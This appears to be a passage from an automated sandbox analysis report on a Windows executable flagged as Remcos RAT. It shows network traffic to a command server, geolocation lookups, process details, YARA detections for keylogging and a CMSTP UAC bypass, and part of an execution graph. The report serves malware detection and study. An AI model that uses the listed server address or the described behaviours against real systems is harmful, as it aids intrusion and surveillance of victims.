                                                                                        Nov 5, 2024 11:04:03.804558992 CET255950113192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:04.304342031 CET255950113192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:04.304406881 CET501132559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:04.304488897 CET501132559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:04.309422970 CET255950113192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:04.400752068 CET501142559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:04.405648947 CET255950114192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:04.405787945 CET501142559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:04.409317970 CET501142559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:04.414141893 CET255950114192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:04.919457912 CET255950114192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:04.919720888 CET501142559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:04.920296907 CET501142559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:04.925096989 CET255950114192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:05.009744883 CET501152559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:05.014624119 CET255950115192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:05.014727116 CET501152559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:05.017909050 CET501152559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:05.022737980 CET255950115192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:05.523601055 CET255950115192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:05.523669004 CET501152559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:05.523705006 CET501152559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:05.530567884 CET255950115192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:05.604079962 CET501162559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:05.608994007 CET255950116192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:05.609096050 CET501162559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:05.617156982 CET501162559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:05.622124910 CET255950116192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:06.128257990 CET255950116192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:06.131162882 CET501162559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:06.131205082 CET501162559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:06.136657000 CET255950116192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:06.213007927 CET501172559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:06.218411922 CET255950117192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:06.218491077 CET501172559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:06.221762896 CET501172559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:06.227258921 CET255950117192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:06.742518902 CET255950117192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:06.743191004 CET501172559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:06.771642923 CET501172559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:06.776602030 CET255950117192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:06.855052948 CET501182559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:06.859945059 CET255950118192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:06.862667084 CET501182559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:06.886750937 CET501182559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:06.892551899 CET255950118192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:07.372462034 CET255950118192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:07.372534990 CET501182559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:07.372626066 CET501182559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:07.377433062 CET255950118192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:07.447408915 CET501192559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:07.452313900 CET255950119192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:07.452398062 CET501192559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:07.456132889 CET501192559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:07.460963011 CET255950119192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:07.979331017 CET255950119192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:07.979396105 CET501192559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:07.979614019 CET501192559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:07.984447956 CET255950119192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:08.056632042 CET501202559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:08.061592102 CET255950120192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:08.061676025 CET501202559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:08.064804077 CET501202559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:08.069608927 CET255950120192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:08.562489033 CET255950120192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:08.562560081 CET501202559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:08.562618017 CET501202559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:08.567524910 CET255950120192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:08.634955883 CET501212559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:08.639844894 CET255950121192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:08.639931917 CET501212559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:08.643347025 CET501212559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:08.648178101 CET255950121192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:09.148169041 CET255950121192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:09.150227070 CET501212559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:09.150316000 CET501212559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:09.155046940 CET255950121192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:09.228394985 CET501222559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:09.233474016 CET255950122192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:09.235234022 CET501222559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:09.238405943 CET501222559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:09.243444920 CET255950122192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:09.760375023 CET255950122192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:09.760468006 CET501222559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:09.760560989 CET501222559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:09.765367985 CET255950122192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:10.781075001 CET501232559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:10.786147118 CET255950123192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:10.786288023 CET501232559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:10.789320946 CET501232559192.168.2.4192.3.64.152
                                                                                        Nov 5, 2024 11:04:10.794151068 CET255950123192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:11.296396971 CET255950123192.3.64.152192.168.2.4
                                                                                        Nov 5, 2024 11:04:11.296756983 CET501232559192.168.2.4192.3.64.152

                                                                                        UDP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Nov 5, 2024 11:00:07.226109982 CET5710953192.168.2.41.1.1.1
                                                                                        Nov 5, 2024 11:00:07.233444929 CET53571091.1.1.1192.168.2.4

                                                                                        DNS Queries

                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                        Nov 5, 2024 11:00:07.226109982 CET192.168.2.41.1.1.10xaccaStandard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                                                                        DNS Answers

                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                        Nov 5, 2024 11:00:07.233444929 CET1.1.1.1192.168.2.40xaccaNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                                                                        HTTP Request Dependency Graph

                                                                                        • geoplugin.net

                                                                                        HTTP Packets

                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.449734178.237.33.50805932C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 5, 2024 11:00:07.245033979 CET71OUTGET /json.gp HTTP/1.1
                                                                                        Host: geoplugin.net
                                                                                        Cache-Control: no-cache
                                                                                        Nov 5, 2024 11:00:08.653970003 CET1165INHTTP/1.1 200 OK
                                                                                        date: Tue, 05 Nov 2024 10:00:07 GMT
                                                                                        server: Apache
                                                                                        content-length: 957
                                                                                        content-type: application/json; charset=utf-8
                                                                                        cache-control: public, max-age=300
                                                                                        access-control-allow-origin: *
                                                                                        Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4b 69 6c 6c 65 65 6e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 54 65 78 61 73 22 2c 0a 20 20 22 67 65 6f 70 [TRUNCATED]
                                                                                        Data Ascii: { "geoplugin_request":"173.254.250.76", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Killeen", "geoplugin_region":"Texas", "geoplugin_regionCode":"TX", "geoplugin_regionName":"Texas", "geoplugin_areaCode":"", "geoplugin_dmaCode":"625", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"31.0065", "geoplugin_longitude":"-97.8406", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/Chicago", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}
                                                                                        Nov 5, 2024 11:00:08.654010057 CET1165INHTTP/1.1 200 OK
                                                                                        date: Tue, 05 Nov 2024 10:00:07 GMT
                                                                                        server: Apache
                                                                                        content-length: 957
                                                                                        content-type: application/json; charset=utf-8
                                                                                        cache-control: public, max-age=300
                                                                                        access-control-allow-origin: *
                                                                                        Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4b 69 6c 6c 65 65 6e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 54 65 78 61 73 22 2c 0a 20 20 22 67 65 6f 70 [TRUNCATED]
                                                                                        Data Ascii: { "geoplugin_request":"173.254.250.76", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Killeen", "geoplugin_region":"Texas", "geoplugin_regionCode":"TX", "geoplugin_regionName":"Texas", "geoplugin_areaCode":"", "geoplugin_dmaCode":"625", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"31.0065", "geoplugin_longitude":"-97.8406", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/Chicago", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}
                                                                                        Nov 5, 2024 11:00:08.654171944 CET1165INHTTP/1.1 200 OK
                                                                                        date: Tue, 05 Nov 2024 10:00:07 GMT
                                                                                        server: Apache
                                                                                        content-length: 957
                                                                                        content-type: application/json; charset=utf-8
                                                                                        cache-control: public, max-age=300
                                                                                        access-control-allow-origin: *
                                                                                        Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4b 69 6c 6c 65 65 6e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 54 65 78 61 73 22 2c 0a 20 20 22 67 65 6f 70 [TRUNCATED]
                                                                                        Data Ascii: { "geoplugin_request":"173.254.250.76", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Killeen", "geoplugin_region":"Texas", "geoplugin_regionCode":"TX", "geoplugin_regionName":"Texas", "geoplugin_areaCode":"", "geoplugin_dmaCode":"625", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"31.0065", "geoplugin_longitude":"-97.8406", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/Chicago", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1192.168.2.449891178.237.33.50805932C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 5, 2024 11:01:22.423628092 CET71OUTGET /json.gp HTTP/1.1
                                                                                        Host: geoplugin.net
                                                                                        Cache-Control: no-cache
                                                                                        Nov 5, 2024 11:01:23.270556927 CET1165INHTTP/1.1 200 OK
                                                                                        date: Tue, 05 Nov 2024 10:01:23 GMT
                                                                                        server: Apache
                                                                                        content-length: 957
                                                                                        content-type: application/json; charset=utf-8
                                                                                        cache-control: public, max-age=300
                                                                                        access-control-allow-origin: *
                                                                                        Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4b 69 6c 6c 65 65 6e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 54 65 78 61 73 22 2c 0a 20 20 22 67 65 6f 70 [TRUNCATED]
                                                                                        Data Ascii: { "geoplugin_request":"173.254.250.76", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Killeen", "geoplugin_region":"Texas", "geoplugin_regionCode":"TX", "geoplugin_regionName":"Texas", "geoplugin_areaCode":"", "geoplugin_dmaCode":"625", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"31.0065", "geoplugin_longitude":"-97.8406", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/Chicago", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                        Statistics

                                                                                        CPU Usage

                                                                                        Click to jump to process

                                                                                        Memory Usage

                                                                                        Click to jump to process

                                                                                        High Level Behavior Distribution

                                                                                        Click to dive into process behavior distribution

                                                                                        Behavior

                                                                                        Click to jump to process

                                                                                        System Behavior

                                                                                        General

                                                                                        Target ID:0
                                                                                        Start time:05:00:02
                                                                                        Start date:05/11/2024
                                                                                        Path:C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe"
                                                                                        Imagebase:0x370000
                                                                                        File size:1'042'944 bytes
                                                                                        MD5 hash:5F9342DF635D0A624F0284FA5BBD8B54
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.1715079039.0000000003791000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.1715079039.0000000003791000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1715079039.0000000003791000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.1715079039.0000000003791000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.1715079039.0000000003FE5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.1715079039.0000000003FE5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1715079039.0000000003FE5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.1715079039.0000000003FE5000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:2
                                                                                        Start time:05:00:04
                                                                                        Start date:05/11/2024
                                                                                        Path:C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe"
                                                                                        Imagebase:0x280000
                                                                                        File size:1'042'944 bytes
                                                                                        MD5 hash:5F9342DF635D0A624F0284FA5BBD8B54
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:3
                                                                                        Start time:05:00:05
                                                                                        Start date:05/11/2024
                                                                                        Path:C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe"
                                                                                        Imagebase:0xb70000
                                                                                        File size:1'042'944 bytes
                                                                                        MD5 hash:5F9342DF635D0A624F0284FA5BBD8B54
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.4150350434.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.4150222621.0000000001198000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                        • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                        Reputation:low
                                                                                        Has exited:false

                                                                                        Disassembly

                                                                                        Reset < >

                                                                                          Execution Graph

                                                                                          Execution Coverage:12.4%
                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                          Signature Coverage:13.2%
                                                                                          Total number of Nodes:91
                                                                                          Total number of Limit Nodes:9
                                                                                          execution_graph 24529 2764564 24530 2764572 24529->24530 24531 2764522 24529->24531 24534 27640f0 24531->24534 24533 2764555 24535 27640fb 24534->24535 24540 2765314 24535->24540 24537 2765712 24544 2765394 KiUserCallbackDispatcher KiUserCallbackDispatcher 24537->24544 24539 27661d8 24539->24533 24541 276531f 24540->24541 24545 27653b4 24541->24545 24543 27662fd 24543->24537 24544->24539 24546 27653bf 24545->24546 24549 27653e4 24546->24549 24548 27663da 24548->24543 24550 27653ef 24549->24550 24553 2765414 24550->24553 24552 27664dc 24552->24548 24554 276541f 24553->24554 24559 2768cdc 24554->24559 24556 2769221 24556->24552 24557 2768ff8 24557->24556 24564 276db98 24557->24564 24560 2768ce7 24559->24560 24561 276a66a 24560->24561 24568 276a6c8 24560->24568 24572 276a6b8 24560->24572 24561->24557 24565 276dbb9 24564->24565 24566 276dbdd 24565->24566 24576 276dd48 24565->24576 24566->24556 24569 276a70b 24568->24569 24570 276a716 KiUserCallbackDispatcher 24569->24570 24571 276a740 24569->24571 24570->24571 24571->24561 24573 276a6bd 24572->24573 24574 276a716 KiUserCallbackDispatcher 24573->24574 24575 276a740 24573->24575 24574->24575 24575->24561 24577 276dd55 24576->24577 24579 276dd8f 24577->24579 24580 276c8d0 24577->24580 24579->24566 24581 276c8db 24580->24581 24582 276eaa8 24581->24582 24584 276e0d4 24581->24584 24585 276e0df 24584->24585 24586 2765414 2 API calls 24585->24586 24587 276eb17 24586->24587 24587->24582 24588 58b0db8 24589 58b0df2 24588->24589 24590 58b0e83 24589->24590 24594 58b12a0 24589->24594 24599 58b12b0 24589->24599 24591 58b0e79 24596 58b12a4 24594->24596 24595 58b1735 24595->24591 24596->24595 24604 58b1c78 24596->24604 24610 58b1c77 24596->24610 24600 58b12de 24599->24600 24601 58b1735 24599->24601 24600->24601 24602 58b1c78 2 API calls 24600->24602 24603 58b1c77 2 API calls 24600->24603 24601->24591 24602->24601 24603->24601 24616 58b0ebc 24604->24616 24606 58b1c9f 24606->24595 24607 58b1cc8 CreateIconFromResourceEx 24609 58b1d46 24607->24609 24609->24595 24611 58b0ebc CreateIconFromResourceEx 24610->24611 24614 58b1c92 24610->24614 24611->24614 24612 58b1c9f 24612->24595 24613 58b1cc8 CreateIconFromResourceEx 24615 58b1d46 24613->24615 24614->24612 24614->24613 24615->24595 24617 58b1cc8 CreateIconFromResourceEx 24616->24617 24618 58b1c92 24617->24618 24618->24606 24618->24607 24510 276bad0 24513 276bbc8 24510->24513 24511 276badf 24514 276bbd9 24513->24514 24517 276bbfc 24513->24517 24522 